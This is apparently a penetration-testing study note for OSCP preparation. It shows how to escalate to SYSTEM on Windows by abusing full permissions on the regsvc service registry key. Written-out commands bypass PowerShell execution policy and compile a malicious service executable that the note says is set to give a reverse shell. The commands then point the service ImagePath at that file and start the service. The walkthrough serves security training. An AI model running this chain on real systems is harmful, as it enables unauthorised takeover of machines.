// notes/ PrivEsc — Windows
🪟

Registy Regsvc Acl

After enumeration, if it's discovered that we have full permissions to a registry key, we can compile a malicious executable written in C and get it to run a command for us as sys…

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/registy_regsvc-acl

Regsvc ACL

Overview

After enumeration, if it's discovered that we have full permissions to a registry key, we can compile a malicious executable written in C and get it to run a command for us as system

Escalation via Regsvc

View permissions on registry key

powerquery
01powershell -exec bypass -NoP
02Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
<figure><img src="/files/d8YqELU3JxFP9Qx2De8h" alt=""><figcaption></figcaption></figure>

Change the command to get a reverse shell and compile the executable

<figure><img src="/files/YecTPLuBpQiWEKtZgEM3" alt=""><figcaption></figcaption></figure>
bash
$x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Add the executable to the service

powerquery
01reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
  • /v - What is the value name
  • ImagePath - Is a registry key that contains the path of the drivers image file
    • So if you place the file here and run the service it will run the executable
  • /t - type being REG_EXPAND_SZ which is running a string value
  • /d - Data being C:\temp\x.exe ; data you want to use
  • /f - No prompts for confirmation just execute

Start the service and pop a shell

code
01sc start regsvc